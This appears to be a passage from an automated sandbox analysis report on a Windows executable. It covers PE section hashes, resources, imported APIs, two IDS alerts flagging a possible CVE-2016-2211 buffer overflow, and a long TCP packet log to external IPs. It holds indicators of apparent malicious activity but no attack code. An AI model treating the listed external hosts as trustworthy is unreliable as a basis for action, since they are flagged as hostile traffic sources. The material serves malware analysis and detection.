                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x5d8a40x5da00815a84730f5749f3dfdc2ead0f15d53cFalse0.5232002044392523data6.516684340520826IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .itext0x5f0000x7a40x800e5b5cd9472dc3374bf67fd8c3e7348b0False0.6025390625data6.04839172387159IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x600000x1d480x1e0018fe7712ac951ef0d3212f00db31c0dbFalse0.3963541666666667data3.8273707838479356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .bss0x620000x36940x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .idata0x660000x251a0x260076fb13664f876356eaf7f55873973c23False0.31743421052631576data4.991838466014285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .tls0x690000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rdata0x6a0000x180x2000ab743220a59789dd31052ef73d8848aFalse0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x6b0000x6a540x6c00a07db1380e85f1f900c3eeeee6fcf760False0.6312934027777778data6.655851461790188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0x720000x988000x988000720b9ce00f1ae5a18d03985410267ffFalse0.4039094518442623data6.557634192523836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_CURSOR0x72af80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                RT_CURSOR0x72c2c0x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                RT_CURSOR0x72d600x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                RT_CURSOR0x72e940x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                RT_CURSOR0x72fc80x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                RT_CURSOR0x730fc0x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                RT_CURSOR0x732300x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                RT_BITMAP0x733640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                RT_BITMAP0x735340x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                                RT_BITMAP0x737180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                RT_BITMAP0x738e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                                RT_BITMAP0x73ab80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                                RT_BITMAP0x73c880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                                RT_BITMAP0x73e580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                                RT_BITMAP0x740280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                RT_BITMAP0x741f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                                RT_BITMAP0x743c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                RT_BITMAP0x745980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                                RT_ICON0x746800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.0979253112033195
                                                                                                                                                RT_ICON0x76c280x15b7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.908256880733945
                                                                                                                                                RT_DIALOG0x781e00x52data0.7682926829268293
                                                                                                                                                RT_DIALOG0x782340x52data0.7560975609756098
                                                                                                                                                RT_STRING0x782880x68data0.5673076923076923
                                                                                                                                                RT_STRING0x782f00x2e8data0.4583333333333333
                                                                                                                                                RT_STRING0x785d80xb8data0.6793478260869565
                                                                                                                                                RT_STRING0x786900xecdata0.6398305084745762
                                                                                                                                                RT_STRING0x7877c0x2ccdata0.4622905027932961
                                                                                                                                                RT_STRING0x78a480x3e8data0.382
                                                                                                                                                RT_STRING0x78e300x370data0.4022727272727273
                                                                                                                                                RT_STRING0x791a00x3ccdata0.33539094650205764
                                                                                                                                                RT_STRING0x7956c0x214data0.49624060150375937
                                                                                                                                                RT_STRING0x797800xccdata0.6274509803921569
                                                                                                                                                RT_STRING0x7984c0x194data0.5643564356435643
                                                                                                                                                RT_STRING0x799e00x3c4data0.3288381742738589
                                                                                                                                                RT_STRING0x79da40x338data0.42961165048543687
                                                                                                                                                RT_STRING0x7a0dc0x294data0.42424242424242425
                                                                                                                                                RT_RCDATA0x7a3700x10data1.5
                                                                                                                                                RT_RCDATA0x7a3800x304data0.7033678756476683
                                                                                                                                                RT_RCDATA0x7a6840x7f7Delphi compiled form 'TSendForm'0.3957822461991172
                                                                                                                                                RT_RCDATA0x7ae7c0x8f838PNG image data, 225 x 225, 8-bit colormap, non-interlacedEnglishUnited States0.40548319928142734
                                                                                                                                                RT_GROUP_CURSOR0x10a6b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                RT_GROUP_CURSOR0x10a6c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                RT_GROUP_CURSOR0x10a6dc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x10a6f00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x10a7040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x10a7180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x10a72c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_ICON0x10a7400x22data1.0588235294117647

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                                kernel32.dllSleep
                                                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                comdlg32.dllGetOpenFileNameA

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-11-11T19:17:05.224463+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449734TCP
                                                                                                                                                2024-11-11T19:17:43.068110+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449741TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 11, 2024 19:16:46.876480103 CET4973080192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:46.881584883 CET804973092.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:46.881769896 CET4973080192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:46.882049084 CET4973080192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:46.887447119 CET804973092.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:46.887514114 CET4973080192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:46.905335903 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:46.910332918 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:46.910432100 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:46.910592079 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:46.915494919 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.585014105 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.585113049 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.585127115 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.585171938 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.585717916 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.585730076 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.585778952 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.586484909 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.586498022 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.586555958 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.587115049 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.587126970 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.587161064 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.587742090 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.587789059 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.590157986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.590253115 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.590297937 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.703010082 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.703136921 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.703150034 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.703203917 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.703735113 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.703747988 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.703785896 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.704262018 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.704273939 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.704329014 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.704870939 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.704881907 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.704936981 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.705558062 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.705570936 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.705621004 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.706232071 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.706244946 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.706284046 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.706904888 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.706918001 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.706928015 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.706948996 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.707081079 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.707576990 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.707590103 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.707633018 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.708268881 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.708281994 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.708292007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.708319902 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.708901882 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.708961964 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.709189892 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.709202051 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.709213972 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.709254980 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.820950985 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.820987940 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.821043015 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.821043015 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.821372986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.821386099 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.821398020 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.821422100 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.821448088 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.822218895 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.822232962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.822246075 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.822257042 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.822293997 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.822294950 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.823061943 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.823072910 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.823082924 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.823096037 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.823112011 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.823148012 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.823961020 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.823976040 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.823987961 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.824016094 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.824879885 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.824893951 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.824904919 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.824930906 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.824947119 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.825797081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.825810909 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.825820923 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.825834990 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.825855970 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.825879097 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.826730967 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.826745987 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.826756954 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.826781988 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.827621937 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.827636003 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.827652931 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.827666044 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.827671051 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.827692032 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.828377962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.828392982 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.828404903 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.828418016 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.828428984 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.828430891 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.828443050 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.828476906 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.829360008 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.829374075 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.829385042 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.829397917 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.829432011 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.829462051 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.830319881 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.830334902 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.830346107 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.830358028 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.830368996 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.830373049 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.830403090 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.831332922 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.831347942 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.831358910 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.831371069 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.831381083 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.831408024 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.832235098 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.832251072 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.832283974 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.874178886 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.938890934 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.938967943 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.938978910 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939088106 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.939265966 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939277887 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939290047 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939332008 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.939332962 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.939884901 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939896107 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939904928 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939912081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939965010 CET4973180192.168.2.492.114.2.230
